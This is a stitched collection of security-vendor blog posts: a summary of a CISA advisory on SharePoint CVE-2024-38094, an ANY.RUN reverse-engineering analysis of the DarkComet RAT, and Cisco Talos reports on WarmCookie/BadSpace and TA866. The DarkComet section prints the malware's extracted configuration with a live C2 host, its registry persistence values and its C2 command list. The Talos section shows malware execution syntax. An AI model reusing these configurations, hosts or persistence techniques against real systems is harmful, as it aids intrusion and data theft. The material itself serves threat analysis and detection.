CISA Warns About New Microsoft SharePoint Vulnerability CVE-2024-38094: High Risks and Immediate Patching Needed

/in

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical advisory regarding newly discovered vulnerabilities in Microsoft SharePoint, specifically addressing a deserialization vulnerability now included in CISA’s Known Exploited Vulnerability (KEV) catalog. 

The vulnerability in question, identified as CVE-2024-38094, has a CVSSv3.1 score of 7.2, which indicates a high-severity risk. It affects several SharePoint products, including Microsoft SharePoint Server Subscription Edition, Microsoft SharePoint Server 2019, and Microsoft SharePoint Enterprise Server 2016.

An authenticated attacker with Site Owner permissions could exploit this vulnerability to inject and execute arbitrary code within the SharePoint environment. The risk of such exploitation is exacerbated by the availability of proof-of-concept (PoC) code in the public domain, heightening the urgency for organizations to act swiftly.

Vulnerability Classification and Summary

CISA’s inclusion of vulnerabilities in the Known Exploited Vulnerabilities (KEV) catalog highlights that these issues are actively being exploited in real-world scenarios, indicating a threat to organizations. 

Specifically, high-severity vulnerabilities like CVE-2024-38094 allow authenticated users with Site Owner permissions to inject arbitrary code into SharePoint Server, leading to potential consequences such as data breaches, ransomware attacks, and privilege escalation. 

Organizations using affected SharePoint versions must prioritize timely patching and implement security measures to combat these threats. This advisory aligns with the established Common Vulnerabilities and Exposures (CVE) framework and the Common Vulnerability Scoring System (CVSS), which categorizes vulnerabilities into high (7.0-10.0), medium (4.0-6.9), and low (0.0-3.9) based on their severity. Importantly, a patch for CVE-2024-38094 is available, and its exploitation in the public domain underscores the urgency for organizations to act.

Recommendations for Organizations

CISA urges organizations to take the following steps to mitigate risks associated with CVE-2024-38094 and similar vulnerabilities:


Organizations should promptly apply the latest patches released by Microsoft. Regular updates of all software and hardware systems are crucial for minimizing vulnerabilities and defending against potential exploits.

Develop a comprehensive patch management strategy encompassing inventory management, patch assessment, testing, deployment, and verification. Where feasible, automate these processes to enhance consistency and efficiency.

Properly segment networks to protect critical assets from exposure to less secure areas. Employ firewalls, VLANs, and strict access controls to limit access and reduce the overall attack surface.

Create and maintain an effective incident response plan. This plan should detail the procedures for detecting, responding to, and recovering from security incidents. Regular testing and updates to the plan will help ensure its alignment with evolving threats.

Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Utilizing Security Information and Event Management (SIEM), systems can facilitate real-time threat detection and improve response capabilities.

Organizations should proactively assess the criticality of any End-of-Life (EOL) products in their infrastructure, planning timely upgrades or replacements to mitigate security risks.

Conclusion

CISA’s advisory highlights the ongoing threats posed by vulnerabilities such as CVE-2024-38094 in Microsoft SharePoint. Organizations must not only recognize the seriousness of these vulnerabilities but also take decisive action to fortify their defenses.

By implementing timely patches and security measures, organizations can reduce their risk of exploitation and maintain the integrity of their systems. Prompt attention to these vulnerabilities is not just advisable; it is essential for protecting sensitive data and maintaining operational security.

The post CISA Warns About New Microsoft SharePoint Vulnerability CVE-2024-38094: High Risks and Immediate Patching Needed appeared first on Cyble.

Blog – Cyble – ​Read More

DarkComet RAT: Technical Analysis of Attack Chain

/in

Editor’s note: The current article is authored by Mostafa ElSheimy, a malware reverse engineer and threat intelligence analyst. You can find Mostafa on X and LinkedIn. 

In this malware analysis report, we take an in-depth look at how the Remote Access Trojan (RAT) DarkComet has been used by attackers to remotely control systems, steal sensitive data, and execute various malicious activities. 

Overview 

DarkComet is a Remote Access Trojan (RAT) initially developed by Jean-Pierre Lesueur in 2008. This malware runs silently in the background, collecting sensitive information about the system, users, and network activity.  

It attempts to steal stored credentials, usernames, passwords, and other personal data, transmitting this information to a destination specified by the attacker.  

Backdoor.DarkComet allows attackers to install further malicious software on the infected machine or enlist it in a botnet for sending spam or other malicious activities.  

Symptoms of an infection may not be noticeable to the user, as it can disable antivirus programs and other Windows security features.  

Distribution methods include: 

Bundling with free software. 

Disguising as harmless programs in emails

Exploiting software vulnerabilities on websites. 

DarkComet became widely used due to its user-friendly graphical interface, which contributed to its popularity.

Technical Details 

Let’s run a sandbox analysis session using ANY.RUN to discover the technical details of this malware. 

View analysis session 

Changing file attributes 

DarkComet uses a command-line operation to alter file attributes, making its components more difficult to detect.  

The command line of DarkComet displayed in ANY.RUN’s sandbox

It uses attrib to display or change file attributes 

+s (System Attribute): Marks the file as a system file, making it appear as a critical part of the operating system. 

+h (Hidden Attribute): Hides the file from regular view in Windows Explorer, making it invisible to most users. 

Dropped executable file inside the summary of IOCs 

It drops an executable at C:UsersadminDocumentsMSDCSCmsdcsc.exe and executes it, making it harder to detect. 

Try advanced malware analysis with ANY.RUN for free 



Get 14-day trial


Contacting Malicious Domains 

The malware establishes communication with a specified malicious domain, enabling remote control and data exfiltration. 

Malicious domain displayed inside the sandbox

Modifying Process Privileges 

The malware interacts with the Windows APIs LookupPrivilegeValueA and AdjustTokenPrivileges to modify the privileges associated with the current process’s access token (not the process itself).  

This is done by obtaining a handle to the process’s access token, which allows the malware to modify its security context. 

Modification of process privileges

If a2 is 0, the privilege is removed (Attributes = 0). 

If a2 is 1, the privilege is enabled (Attributes = 2). 

Gathering System Information 

Retrieving Hardware Profile 

Use of GetCurrentHwProfileA API

DarkComet uses the GetCurrentHwProfileA API to collect detailed information about the infected system’s hardware: 

Hardware Profile ID (HWID): A Globally Unique Identifier (GUID) that identifies the current hardware profile, allowing the malware to uniquely recognize the system. 

Dock State: Extracted through the dwDockInfo field, this information reveals whether the system is docked (e.g., connected to a docking station) or undocked. This helps the malware adapt its behavior based on the system’s hardware configuration. 

Demonstration of GUID and Dock State

Retrieving Date, Time, and Location 

The malware also gets the date and time of the victim device. 

Retrieval of date and time

It also checks the computer’s location settings by querying the registry key associated with the current user’s Security Identifier (SID):  

REGISTRYUSER{SID}Control PanelInternationalGeoNation 

Data Processing and Manipulation 

DarkComet uses a function called sub_4735E8 multiple times with different strings as parameters. 

Use of sub_4735E8 function

This function carries out resource management and processes various pieces of data, including:  

C2 Domain Information: The Command and Control server the malware communicates with. 

SID (Security Identifier): Identifies the user profile associated with the malware’s activity. 

Mutex Values: Used to ensure that only one instance of the malware runs on the infected system at a time. 

This function helps obfuscate key information, preventing it from appearing directly in the strings section of the malware. 

Data processing and data manipulation with v28

With this function, the malware loops through DARKCOMET DATA to retrieve specific attributes based on the provided parameter strings. 

DARKCOMET DATA

Here is the loop that the malware uses to iterate through DARKCOMET DATA: 

Demonstration of the loop used by DarkComet

Within sub_4735E8, DarkComet iterates through its internal data set, known as DARKCOMET DATA, to match specific parameters and extract corresponding attributes. This process involves looping through data entries to retrieve the needed values based on the provided strings. 

Extracted DARKCOMET DATA: 

#BEGIN DARKCOMET DATA —

MUTEX={DC_MUTEX-D1SPNDG}

SID={Sazan}

FWB={0}

NETDATA={8.tcp.eu.ngrok.io:27791}

GENCODE={fKTZRKdv0Nij}

INSTALL={1}

COMBOPATH={7}

EDTPATH={MSDCSC\msdcsc.exe}

KEYNAME={MicroUpdate}

EDTDATE={16/04/2007}

PERSINST={0}

MELT={0}

CHANGEDATE={0}

DIRATTRIB={6}

FILEATTRIB={6}

FAKEMSG={1}

EF={1}

MSGCORE={{42696C67697361796172FD6EFD7A20332073616E6979652069E7696E64652079656E6964656E206261FE6C6174FD6C6163616B74FD722E2E2E}

MSGICON={48}

SH1={1}

CHIDEF={1}

CHIDED={1}

PERS={1}

OFFLINEK={1}

#EOF DARKCOMET DATA —

From this data, the malware extracts and processes key attributes, including: 

C2 domain: Specifies where the malware sends stolen data. 

EDTDATE: The date associated with the malware’s installation (e.g., 16/04/2007), indicating that it does not alter the date of the dropped executable. 

The processed C2 domain & EDTDATE

Mutex: Ensures that only one copy of DarkComet runs on the system. 

The processed Mutex

Campaign name: Used for identifying specific attacks or operations. 

Processed campaign name

It also processes the attributes of the malware that define how it behaves and interacts with the system: 

EDTPath: Path of the executable (MSDCSCmsdcsc.exe) 

The path of the new executable

Registry Key (KEYNAME): MicroUpdate, used to maintain persistence in the system’s registry. 

reg_key (KEYNAME): MicroUpdate

From the DARKCOMET DATA, we can also notice that the malware does not change the original creation date of the dropped executable. The CHANGEDATE attribute is set to 0, indicating that the date remains unchanged, which can help the malware blend in with other files and avoid raising suspicion during forensic analysis. 

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis


Read full guide


Dropped Executable File 

DarkComet drops a file named msdcsc.exe in the C:UsersadminDocumentsMSDCSC directory and executes it from there. 

The dropped executable file

This dropped file is identical to the original malware executable. 

Comparison of the original and executable files

This means it can start itself from another location. By doing so, the malware can better evade detection, as running from a new path makes it more challenging for security tools to track its activity. 

Persistence Mechanisms 

To maintain persistence on the infected system, DarkComet: 

Adds Run key: It creates a registry entry at SOFTWAREMicrosoftWindowsCurrentVersionRunMicroUpdate with the path of the executable. 

Modifies the WinLogon registry key: It alters REGISTRYMACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserInit for persistance. 

Registry entry creation

DLL Loading and Function Resolution 

DarkComet retrieves handles to the modules (DLLs) such as kernel32.dll and user32.dll for further manipulation and execution of its malicious functions. 

Module handle retrieval for DLL

RAT Functionalities 

DarkComet has various capabilities that allow it to manipulate the infected system and gather information. These include functions for simulating user input, capturing data, and interacting with the system’s display and clipboard. 

Simulating Mouse and Keyboard Actions 

DarkComet uses the mouse_event function to simulate mouse motion and button clicks.  

implementation of mouse_event

This helps the attacker to interact with the system as if a user is controlling the mouse. 

DarkComet synthesizing the mouse motion and button clicks

This malware also uses Keyboard Event Simulation, particularly, the keybd_event function to allow the malware to manipulate the user’s environment, input data, or perform actions without the user’s knowledge. 

Implementation of the keybd_event function

Capturing Keyboard Inputs 

The malware calls GetKeyboardType(0) to determine the type of the primary keyboard. If it returns 7, it indicates that the keyboard is a “language” keyboard, which is often a Unicode keyboard. 

DarkComet retrieving information about the current keyboard

The next function captures keystrokes from the user, allowing the malware to record input without detection. 

Keyboard input capture

The function used by DarkComet processes each character input (ch), which could represent a keyboard key or a specific command. It applies a series of conditional checks and actions based on the character’s value. 

This malware utilizes the VkKeyScanA(ch) function to convert the character into a virtual key code. This conversion allows the malware to accurately interpret and simulate keyboard actions, making it easier to log keystrokes or execute commands. 

Conversion of characters into keystrokes

System and Display Information 

The malware uses EnumDisplayDevicesA function to retrieve information about display devices connected to the system. 

Retrieving Display information connected to the system

DarkComet attempts to access data from the clipboard, focusing on format 0xE, which is used for enhanced metafiles (EMF) – a vector graphics format. By doing so, the RAT can exfiltrate or manipulate clipboard data, such as copied images or text. 

Retrieving data from the clipboard

C2 Commands and Remote Control 

DarkComet receives instructions from its Command and Control (C2) server, allowing it to perform various remote tasks. These commands enable the attacker to control the malware’s behavior and may include actions like: 

Data exfiltration: Extracting files or information from the infected system. 

System manipulation: Modifying system settings or terminating processes. 

Additional payload delivery: Deploying additional malicious software into the infected system. 

See Appendix I for the extracted commands that the C2 server sends to the malware.  

These commands help control the malware’s behavior remotely and may provide insight into the attacker’s objectives and tactics.

Conclusion 

DarkComet is a highly capable Remote Access Trojan (RAT) that continues to be a threat due to its stealthy behavior and extensive feature set. It allows attackers to manipulate infected systems remotely, steal sensitive information, and install additional malware.  

This analysis has demonstrated DarkComet’s ability to evade detection by modifying file attributes, manipulating registry keys for persistence, and escalating privileges. It gathers system information, including hardware profiles and location settings, and communicates with a command-and-control (C2) server to execute a variety of commands, from capturing keystrokes to controlling display devices. 

The malware’s functionality, including its ability to modify system settings, simulate user input, and manage services, makes it a versatile tool for attackers. Its ease of use, coupled with a rich set of RAT functionalities, has contributed to its widespread deployment, especially in targeted cyberattacks. 

About ANY.RUN  

ANY.RUN helps more than 400,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI LookupYARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

Detect malware in seconds. 

Interact with samples in real time. 

Save time and money on sandbox setup and maintenance 

Record and study all aspects of malware behavior. 

Collaborate with your team 

Scale as you need. 

Request free trial → 

Appendix I

IOCs 

Hashes 

md5: 1b540a732f2d75c895e034c56813676a 

sha1: 0dd8c542fd46dd5b55eefcf35382ee8903533703 

sha256: 90d3dbe2c8ae46b970a865f597d091688e7c04c7886a1ec287e4b7a0f5e2fcf1

C2 

8[.]tcp[.]eu[.]ngrok[.]io[:]27791 

Registry keys 

REGISTRYMACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserInit = “C:\Windows\system32\userinit.exe,C:\Users\Admin\Documents\MSDCSC\msdcsc.exe” 

REGISTRYUSERUSER SIDSOFTWAREMicrosoftWindowsCurrentVersionRunMicroUpdate = “C:\Users\Admin\Documents\MSDCSC\msdcsc.exe” 

Dropped executable file 

C:UsersadminDocumentsMSDCSCmsdcsc.exe 

TTPs

TACTIC 

TECHNIQUE 

MITRE ATT&CK ID 

Persistence 

Boot or Logon Autostart Execution 

T1547 

Adds Run key to start application 

T1547.001 

Winlogon Helper DLL 

T1547.004 

Privilege Escalation 

Boot or Logon Autostart Execution 

T1547 

Adds Run key to start application 

T1547.001 

Winlogon Helper DLL 

T1547.004 

Defense Evasion 

Modify Registry 

T1112 

Hide Artifacts 

T1564 

Hidden Files and Directories 

T1564.001 

Discovery 

Query Registry 

T1012 

System Information Discovery 

T1082 

System Location Discovery 

T1614 

System Language Discovery 

T1614.001 

Command and Control 

Web Service 

T1102 

Commands

GetSIN

RefreshSIN

RunPrompt

GetDrives

GetSrchDrives

GetFileAttrib

KillProcess

GetAppList

GetServList

StartServices

StopServices

RemoveServices

InstallService

GetStartUpList

ActiveOnlineKeylogger

ActiveOfflineKeylogger

GetOfflineLogs

Shutdown

RestartComp

LogOffComp

PowerOff

GetFullInfo

GetSystemInfo

OpenWebPage

PrintText

GetTorrent

GetPrivilege

TraceRoute

#BOT#VisitUrl

#BOT#OpenUrl

#BOT#Ping

#BOT#RunPrompt

#BOT#CloseServer

#BOT#SvrUninstall

#BOT#URLUpdate

DOWNLOADFILE

UPLOADFILE

ACTIVEREMOTESHELL

DESKTOPCAPTURE

WEBCAMLIVE

WIFI

CHAT

FTPFILEUPLOAD

The post DarkComet RAT: <br>Technical Analysis of Attack Chain appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Threat Spotlight: WarmCookie/BadSpace

/in

WarmCookie is a malware family that emerged in April 2024 and has been distributed via regularly conducted malspam and malvertising campaigns. WarmCookie, observed being used for initial access and persistence, offers a means for continuous long-term access to compromised environments and is used to facilitate delivery of additional malware such as CSharp-Streamer-RAT and Cobalt Strike. Post-compromise intrusion activity associated with WarmCookie overlaps with previously observed activity we attribute to TA866.  We assess that WarmCookie was likely developed by the same threat actor(s) as Resident backdoor, a post-compromise implant previously deployed in intrusion activity that Cisco Talos attributes to TA866.  

What is WarmCookie? 

WarmCookie, also known as BadSpace, is a malware family that has been distributed since at least April 2024. Throughout 2024, we have observed several distribution campaigns conducted using a variety of lure themes to entice victims to take actions that result in malware infection.  

These campaigns typically rely on malspam or malvertising to initiate the infection process that results in the delivery of WarmCookie. WarmCookie offers a variety of useful functionality for adversaries including payload deployment, file manipulation, command execution, screenshot collection and persistence, making it attractive to use on systems once initial access has been gained to facilitate longer-term, persistent access within compromised network environments.  

In previously analyzed intrusion activity involving WarmCookie, we have observed that it is used as an initial payload and that CSharp-Streamer-RAT and Cobalt Strike were delivered following the initial WarmCookie infection.  

While analyzing the campaigns, intrusion activity, and infrastructure associated with WarmCookie over the course of 2024, we also identified multiple overlaps with activity conducted by TA866 in 2023. 

Typical infection chains 

As previously mentioned, we have observed WarmCookie campaigns being conducted since at least April 2024. These campaigns rely on malspam or malvertising to facilitate the delivery of malicious content.  

In the case of malspam, we have observed consistent use of invoice-related and job agency themes that entice victims to access hyperlinks present in either the email body, or within attached documents, such as PDFs.  

Examples of common message subjects observed in campaigns conducted between April and August 2024 are listed below. 

United Rentals Inc: Invoice# [0-9]{9}-[0-9]{3} Invoice and Remittance

In a recent campaign conducted in August, the messages contained PDF attachments. The attachment filenames were randomized but typically use the following format. 

Attachment_[0-9]{3}-[0-9]{3}.pdf

While there have been variations over time, below is a representative example of one of these emails and the associated PDF attachment. 

WarmCookie emails and attachments.

The PDFs contain hyperlinks that direct victims to web servers hosting malicious JavaScript files that continue the infection process. 

We have also observed WarmCookie campaigns leveraging infrastructure associated with traffic distribution and malware delivery systems. In one early campaign, we observed the use of the LandUpdates808 cluster of infrastructure described here. In observed cases, malicious JavaScript downloaders were being hosted at the following paths on servers associated with the LandUpdates808 cluster of web servers. 

/wp-content/upgrade/update[.]php

Regardless of whether the delivery stage of the attack was conducted via malspam or malvertising, an obfuscated JavaScript downloader is delivered that is responsible for continuing the infection process. We have observed the use of ZIP archives to compress the JavaScript file and the delivery of the JavaScript file directly from the distribution infrastructure.  

When executed, it deobfuscates and executes a PowerShell command that uses Bitsadmin to retrieve and execute the WarmCookie DLL using syntax, like that shown below. 

PowerShell execution.

We have observed a relatively small number of distribution servers hosting WarmCookie DLLs compared to the infrastructure used in earlier stages of the infection chain.  

WarmCookie 

The main WarmCookie payload has been extensively analyzed in prior reporting here and here. While performing this research, newly observed WarmCookie samples were reported on social media during September 2024. We observed significant additions and changes in this latest version that demonstrate the threat actor is continuing to improve their tooling.  

We observed changes to the way the malware is executed and how persistence is achieved on infected systems. As described in prior reporting, the malware is typically delivered and executed as a PE DLL or a PE EXE. If the payload is in the DLL format, it is typically executed with specific command-line parameters that determine whether persistence should be achieved.  

In previous WarmCookie samples the execution was consistent with the following: 

rundll32.exe <DLL_Filename>,Start /p

In the latest samples analyzed, this command-line syntax has been modified as follows: 

rundll32.exe <DLL_Filename>,Start /u

Additionally, the user agent used during C2 communications in previous WarmCookie samples featured extraneous spaces not consistent with normal user agent strings seen in the wild. This allowed for easy detection of WarmCookie C2 activity via network traffic inspection. In the latest WarmCookie samples, this mistake has been corrected. Below is a comparison between the old and new user agent strings used during C2 communications. 

Old User Agent: 

Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR 1.0.3705)

New User Agent: 

Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

We also observed the inclusion of a new self-updating mechanism that would enable an attacker to dynamically deliver updates to WarmCookie via the C2 server, however, this functionality did not appear to be fully implemented in the analyzed sample at the time. 

In the latest sample, changes were made to the sandbox detection mechanism present in the malware where some checks present in previous versions have been removed. 

WarmCookie sandbox detection.

Several changes to the C2 commands supported by the malware have also been made in the latest WarmCookie samples analyzed. The command to remove persistence and the malware itself has been deleted. New commands have been added as follows: 

Command 0x8: Supports the creation of a DLL file received from the C2 server that is assigned a temporary filename and then executed by WarmCookie.   Command 0xA: Appears to be a prepared update command, it is like Command 0x8, but adds hardcoded parameters to the DLL:  
C:WindowsSystem32rundll32.exe <tmpfilename.dll> Start /updateCommand 0xB: Supports moving the malware to a temporary file name and location and deletes the previously scheduled task. It prepends the string ‘dat’ to the temporary filename. It also exits the C2 loop, leading to termination of the malware process. 

During the malware’s initialization and startup phase, the /update parameter of the Command 0xA is checked to determine if the parameter was set. Regardless of the result of this check, the same function is executed, as shown below. 

WarmCookie update parameter. 

Analysis suggests that the malware will continue to evolve moving forward as the threat actor continues to improve on it and adds additional functionality as needed. 

Links to past intrusion activity 

While analyzing the distribution campaigns, infrastructure used, and post-compromise intrusion activity associated with WarmCookie, we identified multiple overlaps with previously observed malicious activity.  

In earlier WarmCookie distribution campaigns, threat actors relied on lures that appear as if they were associated with talent/job search agencies. As mentioned here, the lure documents and landing pages associated with this campaign are like those used by distributors of Ursnif in past campaigns.  

While analyzing intrusion activity associated with WarmCookie, we observed the deployment of CSharp-Streamer-RAT as a follow-on payload following the initial system compromise. CSharp-Streamer-RAT is a full-featured remote access trojan that offers robust functionality as described here.  

In this case, the sample reached out to a C2 server that was configured to use an SSL certificate that appeared to have been programmatically generated with several fields randomly populated. Using Regular Expressions to identify other servers with similar SSL characteristics, we identified three additional C2 servers, all previously associated with CSharp-Streamer-RAT samples. One of these C2 servers was observed being used by a CSharp-Streamer-RAT sample we identified in a previous intrusion that we assess with high confidence was conducted by TA866.  

The screenshot below shows the relevant fields present within the SSL certificate associated with the CSharp-Streamer-RAT C2 server observed in previous intrusion activity we attribute to TA866.  

Previous CSharp-Streamer-RAT C2 SSL certificate.

Below is an example of one of the SSL certificates associated with the CSharp-Streamer-RAT C2 server observed in recent WarmCookie intrusion activity. 

Recent CSharp-Streamer-RAT C2 SSL certificate.

Based on analysis of the system involved in this prior intrusion activity, we assess with high confidence that TA866/Asylum Ambuscade deployed CSharp-Streamer-RAT while directly operating on the system leading up to, during, and after its deployment. In the recent WarmCookie case, we also assess with high confidence that the attacker who deployed WarmCookie also deployed CSharp-Streamer-RAT following the initial compromise.

WarmCookie vs. Resident backdoor 

As referenced here, and in prior reporting, TA866/Asylum Ambuscade has been observed delivering a post-compromise implant called Resident backdoor in prior intrusion activity. Prior reporting on WarmCookie has alluded to observed links between Resident backdoor and WarmCookie.

We performed a code and function level analysis of Resident backdoor samples from previous intrusion activity and WarmCookie samples from September 2024 and observed several notable similarities in the way core functionality has been implemented across both malware families. WarmCookie appears to contain much of the same functionality as Resident backdoor but has been significantly extended to support additional functionality.  

We assess that both were likely developed by the same entity based on the following analysis findings: 

The RC4 implementation is consistent across both malware families. The RC4 string decryption function implementation is consistent across both malware families. Mutex management is performed consistently across both malware families. Both malware families use GUID-like strings for the mutex. The way in which various functions were constructed and the coding conventions used is consistent. The definition of scheduled tasks to achieve persistence is consistent. Both malware families wait one minute before executing the scheduled task. The directory, file schema and parameters are similar in both malware families.  The initial startup logic and command line parameter implementation are similar. 

Code similarity analysis 

We conducted a similarity analysis of the code execution flow between both Resident backdoor and a recent WarmCookie sample that was shared on social media. We observed consistent implementation of core functionality across both as well as consistent use of coding conventions across both malware families. 

Task Scheduler implementation 

If the malware is initially executed without supplying any parameters, both Resident and WarmCookie first determine if the initially launched application was a PE DLL or an PE EXE. Depending on the result, they either create a filename with the extension “.dll” or “.exe”. Also based on the results of this test, they both create a scheduled task via the Windows Task Scheduler, which spawns a copy of the malware after waiting for 60 seconds. In the case that the initially launched application was a PE DLL, rundll32.exe is used to launch the malware. In the case of a PE EXE file, it is executed directly.  

They both attempt this in the %ALLUSERSPROFILE% directory, if that fails, they try it again in %ALLDATA% directory. 

WarmCookie startup parameters.WarmCookie persistence mechanism.Resident backdoor startup parameters.Resident backdoor persistence mechanism.Resident backdoor persistence mechanism (cont’d).

The overall startup logic is also the same in both Resident backdoor and WarmCookie. At the beginning of the startup process both check to determine if the malware was executed with a command line switch. In the case of the Resident backdoor, it is ‘/p’; in the case of WarmCookie it is ‘/u’. This parameter tells the application whether it is the first instance of itself or if the running version is the former copied version, which was previously made persistent via the Task Scheduler. This prevents multiple scheduled tasks from being created once the malware has achieved persistence.  

WarmCooke startup logic.Resident backdoor startup logic.

One slight difference is that Resident uses the hardcoded string ‘RtlUpd’ to generate the filename for the scheduled task, whereas WarmCookie uses a hardcoded list of company names and randomly selects one, as shown below: 

WarmCookie filename list.

Based on our analysis of Resident backdoor and WarmCookie, we assess that they were likely developed by the same entity. While there are significant overlaps in the code and functionality implementations across Resident backdoor and WarmCookie, WarmCookie contains significantly more robust functionality and command support compared to Resident backdoor. Additionally, while WarmCookie has typically been deployed as an initial access payload in intrusion activity we have analyzed, Resident backdoor was deployed post-compromise following the deployment of several other components such as WasabiSeed, Screenshotter and AHK Bot.  

Given the differences in functionality and where each is encountered in the attack lifecycle, we classify Resident and WarmCookie as separate malware families that have been developed by the same threat actor. 

Coverage 

Ways our customers can detect and block this threat are listed below. 

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org

The following Snort rule(s) have been developed to detect activity associated with this malicious activity.  

Snort 2 SIDs: 64139, 64140, 64141, 64142, 64143, 64144, 64145, 64146, 64147, 64148, 64149, 64150, 64151, 64152, 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162. Snort 3 SIDs: 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162, 301044, 301045, 301046, 301047, 301048, 301049, 301050.  

The following ClamAV signatures have been developed to detect activity associated with this malicious activity.  

Js.Downloader.Agent-10022279-0  Vbs.Downloader.Agent-10022291-0  Win.Trojan.WasabiSeed-10022304-0  Js.Trojan.Screenshotter-10022306-0  Js.Trojan.Agent-10022307-0  Win.Trojan.Lazy-10022308-0  Win.Trojan.Screenshotter-10022309-0  PUA.Win.Tool.NetPing-10022493-0  Win.Malware.CobaltStrike-10022494-0  PUA.Win.Tool.AutoHotKey-10022305-1  PUA.Win.Tool.RemoteUtilities-9869515-0  PUA.Win.Tool.AdFind-9962378-0   Txt.Downloader.AHKBot-10024463-0  Ps1.Malware.CobaltStrike-10024466-0  Win.Infostealer.Rhadamanthys-10024467-0  Txt.Infostealer.Rhadamanthys-10024468-0  Win.Backdoor.Agent-10025011-0  Vbs.Trojan.Screenshotter-10025015-0  Win.Malware.Warmcookie-10036688-0 Win.Malware.CSsharpStreamer-10036641-0 

Indicators of Compromise 

Indicators of compromise associated with WarmCookie/BadSpace activity can be found in our GitHub repository here

Cisco Talos Blog – ​Read More

Highlighting TA866/Asylum Ambuscade Activity Since 2021

/in

TA866 (also known as Asylum Ambuscade) is a threat actor that has been conducting intrusion operations since at least 2020. TA866 has frequently relied on commodity and custom tooling to facilitate post-compromise activities. These tools often perform specific functions and are deployed and used as needed in the context of specific intrusions. Cisco Talos assesses with high confidence that TA866 frequently leverages business relationships with other threat actors across various stages of their attacks to help them achieve their mission objective(s). We assess with high confidence that recent post-compromise intrusion activity associated with WarmCookie/BadSpace is related to previous post-compromise activity that we attribute to TA866. We assess that WarmCookie was likely developed by the same threat actor that developed the Resident backdoor that was delivered in previous intrusions that we attribute to TA866. 

Who is TA866? 

TA866, also called Asylum Ambuscade, is a threat actor that has been observed conducting intrusion operations since at least 2020. TA866 has historically been associated with financially motivated malware campaigns. However, prior reporting indicates that they may also conduct espionage-related activities. Cisco Talos has been monitoring and analyzing the malware distribution campaigns, and post-compromise intrusion activity associated with TA866 and has observed continued evolution in the tooling and tactics, techniques and procedures (TTPs) employed by this threat actor since early 2023.  

Throughout 2023, these malware campaigns typically relied on malspam or malvertising to facilitate the delivery of malicious content to potential victims. In many cases, this content is used to redirect victims to traffic distribution systems (TDS), such as 404 TDS, operated by threat actors offering malware installation services.  

This is followed by the deployment of a variety of malicious components. Since at least early 2023, this has typically included WasabiSeed, ScreenShotter and AHK Bot. Based on analysis of post-compromise activity associated with this tooling, we assess with high confidence that TA866 also sometimes deploys a persistent backdoor called Resident, CSharp-Streamer-RAT, Cobalt Strike and Rhadamanthys on compromised systems. To enable the performance of various post-compromise enumeration and reconnaissance activities, we have also observed the use of utilities such as AdFind and network scanners. TA866 also commonly deploys remote access solutions on infected systems such as AnyDesk and Remote Utilities. 

We have observed continued ongoing evolution in the implementation of the malware tooling leveraged by TA866 that enables them to operate more effectively once they obtain initial access. This demonstrates an adversary that is constantly evolving as they attempt to gain access to corporate networks and pursue their mission objective(s).  

While analyzing recent WarmCookie/BadSpace activity, we observed a case in early 2024 where Cobalt Strike and CSharp-Streamer-RAT were deployed as follow-on payloads following the initial WarmCookie infection. The SSL certificate used on the CSharp-Streamer-RAT C2 server (185[.]73[.]124[.]164) appeared to have been generated using information programmatically populated using an algorithm defined by the threat actor. This same algorithm appears to have been used on three additional CSharp-Streamer-RAT C2 servers, one of which (109[.]236[.]80[.]191), was the C2 server for a CSharp-Streamer-RAT sample observed in a prior intrusion in 2023 that we attribute to TA866.  

Typical distribution campaigns 

As previously mentioned, initial access to target environments is typically obtained by TA866 through successfully infecting systems via either malspam or malvertising. Throughout 2022 and 2023, we frequently observed TA866 relying on both methods for initiating the infection process. 

In the case of malspam, we have observed TA866 relying on various lure themes and techniques, including email thread hijacking, a technique where threat actors leverage replies to legitimate email threads that the recipient was previously a part of to increase the legitimacy of the malicious email. Prior reporting suggests that, in previous campaigns, the malspam may have been associated with a spam botnet operated by TA571.  

In most cases, the threat actor embedded malicious hyperlinks, either directly into the body of the email message, or within an attached document, typically PDFs or Microsoft Publisher files. Below is an example of an email from an earlier TA866 campaign. 

In the case of malvertising, we have observed instances of users being infected while browsing for legitimate software downloads for applications such as TeamViewer when the infection process began. Prior reporting indicates that TA866 has been observed leveraging malicious Google advertisements and SEO poisoning to infect victims. 

The hyperlinks in these cases pointed to entry points into the 404 TDS. The 404 TDS is a traffic distribution system that enables adversaries to deploy rapidly changing infrastructure which is used to direct potential victims to malicious content, in many cases, malware.  

